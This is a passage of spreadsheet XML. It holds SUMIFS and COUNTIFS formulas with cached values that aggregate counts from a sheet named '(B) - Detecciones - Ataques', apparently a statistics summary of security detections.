        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>8</v>
      </c>
      <c r="CL73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>3</v>
      </c>
      <c r="CN73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>23</v>
      </c>
      <c r="CQ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>1771</v>
      </c>
      <c r="CT73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>48</v>
      </c>
      <c r="CZ73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI73" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ73" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BK3:$BK139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>1</v>
      </c>
      <c r="DK73" s="271"/>
      <c r="DO73" s="279"/>
      <c r="DP73" s="271"/>
      <c r="DQ73" s="271"/>
      <c r="DR73" s="271"/>
      <c r="DS73" s="271"/>
      <c r="DT73" s="271"/>
      <c r="DU73" s="271"/>
      <c r="DV73" s="271"/>
      <c r="DW73" s="271"/>
      <c r="DX73" s="271"/>
      <c r="DY73" s="271"/>
      <c r="DZ73" s="271"/>
      <c r="EA73" s="271"/>
      <c r="EB73" s="271"/>
      <c r="EC73" s="271"/>
      <c r="ED73" s="280"/>
      <c r="EG73" s="279"/>
      <c r="EH73" s="271"/>
      <c r="EI73" s="271"/>
      <c r="EJ73" s="271"/>
      <c r="EK73" s="271"/>
      <c r="EL73" s="271"/>
      <c r="EM73" s="271"/>
      <c r="EN73" s="271"/>
      <c r="EO73" s="271"/>
      <c r="EP73" s="478"/>
      <c r="EQ73" s="478"/>
      <c r="ER73" s="478"/>
      <c r="ES73" s="271"/>
      <c r="ET73" s="271"/>
      <c r="EU73" s="271"/>
      <c r="EV73" s="271"/>
      <c r="EW73" s="271"/>
      <c r="EX73" s="271"/>
      <c r="EY73" s="271"/>
      <c r="EZ73" s="271"/>
      <c r="FA73" s="280"/>
      <c r="FD73" s="480"/>
      <c r="FE73" s="480"/>
      <c r="FF73" s="480"/>
      <c r="FG73" s="480"/>
      <c r="FH73" s="480"/>
      <c r="FI73" s="480"/>
      <c r="FJ73" s="480"/>
      <c r="FK73" s="480"/>
      <c r="FL73" s="480"/>
      <c r="FM73" s="480"/>
      <c r="FN73" s="480"/>
      <c r="FO73" s="480"/>
      <c r="FP73" s="480"/>
      <c r="FQ73" s="480"/>
      <c r="FR73" s="480"/>
      <c r="FS73" s="480"/>
      <c r="FT73" s="480"/>
      <c r="FU73" s="480"/>
      <c r="FV73" s="480"/>
      <c r="FW73" s="480"/>
      <c r="FX73" s="480"/>
      <c r="FY73" s="379" t="s">
        <v>209</v>
      </c>
      <c r="FZ73" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*"))</f>
        <v>0.5128205128</v>
      </c>
      <c r="GA73" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*"))</f>
        <v>0.6153846154</v>
      </c>
      <c r="GB73" s="480"/>
      <c r="GC73" s="379" t="s">
        <v>209</v>
      </c>
      <c r="GD73" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*"))</f>
        <v>0.5897435897</v>
      </c>
      <c r="GE73" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY56)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY56 &amp; "*"))</f>
        <v>0.6923076923</v>
      </c>
      <c r="GF73" s="480"/>
      <c r="GG73" s="480"/>
      <c r="GH73" s="480"/>
      <c r="GI73" s="480"/>
      <c r="GJ73" s="480"/>
      <c r="GK73" s="480"/>
      <c r="GL73" s="480"/>
      <c r="GM73" s="480"/>
      <c r="GN73" s="480"/>
      <c r="GO73" s="480"/>
      <c r="GP73" s="480"/>
      <c r="GQ73" s="480"/>
      <c r="GR73" s="480"/>
      <c r="GS73" s="480"/>
      <c r="GT73" s="480"/>
      <c r="GU73" s="480"/>
      <c r="GV73" s="480"/>
      <c r="GW73" s="480"/>
      <c r="GX73" s="480"/>
      <c r="GY73" s="480"/>
      <c r="GZ73" s="480"/>
      <c r="HA73" s="480"/>
      <c r="HB73" s="480"/>
      <c r="HC73" s="480"/>
      <c r="HD73" s="480"/>
      <c r="HE73" s="480"/>
      <c r="HF73" s="480"/>
      <c r="HG73" s="480"/>
      <c r="HH73" s="480"/>
      <c r="HI73" s="480"/>
      <c r="HJ73" s="480"/>
      <c r="HK73" s="480"/>
      <c r="HL73" s="480"/>
      <c r="HM73" s="480"/>
      <c r="HN73" s="480"/>
      <c r="HO73" s="480"/>
      <c r="HP73" s="480"/>
    </row>
    <row r="74">
      <c r="J74" s="277"/>
      <c r="K74" s="386" t="s">
        <v>2555</v>
      </c>
      <c r="L74" s="387" t="s">
        <v>2556</v>
      </c>
      <c r="M74" s="387" t="s">
        <v>2557</v>
      </c>
      <c r="N74" s="388" t="s">
        <v>2558</v>
      </c>
      <c r="O74" s="278"/>
      <c r="Q74" s="271"/>
      <c r="R74" s="352" t="s">
        <v>2541</v>
      </c>
      <c r="S74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>724606</v>
      </c>
      <c r="T74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>719839</v>
      </c>
      <c r="U74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>612</v>
      </c>
      <c r="V74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>37</v>
      </c>
      <c r="W74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="X74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>91661</v>
      </c>
      <c r="Y74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>802</v>
      </c>
      <c r="Z74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>4552249</v>
      </c>
      <c r="AA74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>526</v>
      </c>
      <c r="AB74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>82</v>
      </c>
      <c r="AC74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>42</v>
      </c>
      <c r="AD74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>9566</v>
      </c>
      <c r="AE74" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>75</v>
      </c>
      <c r="AF74" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>11652</v>
      </c>
      <c r="AG74" s="271"/>
      <c r="AH74" s="352" t="s">
        <v>2541</v>
      </c>
      <c r="AI74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>724598</v>
      </c>
      <c r="AJ74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>7</v>
      </c>
      <c r="AL74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>719839</v>
      </c>
      <c r="AN74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>350</v>
      </c>
      <c r="AR74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>247</v>
      </c>
      <c r="AS74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>4</v>
      </c>
      <c r="AU74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>9</v>
      </c>
      <c r="AV74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>9</v>
      </c>
      <c r="BA74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>12</v>
      </c>
      <c r="BB74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>91649</v>
      </c>
      <c r="BD74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>2</v>
      </c>
      <c r="BF74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>9</v>
      </c>
      <c r="BG74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>2</v>
      </c>
      <c r="BJ74" s="355">
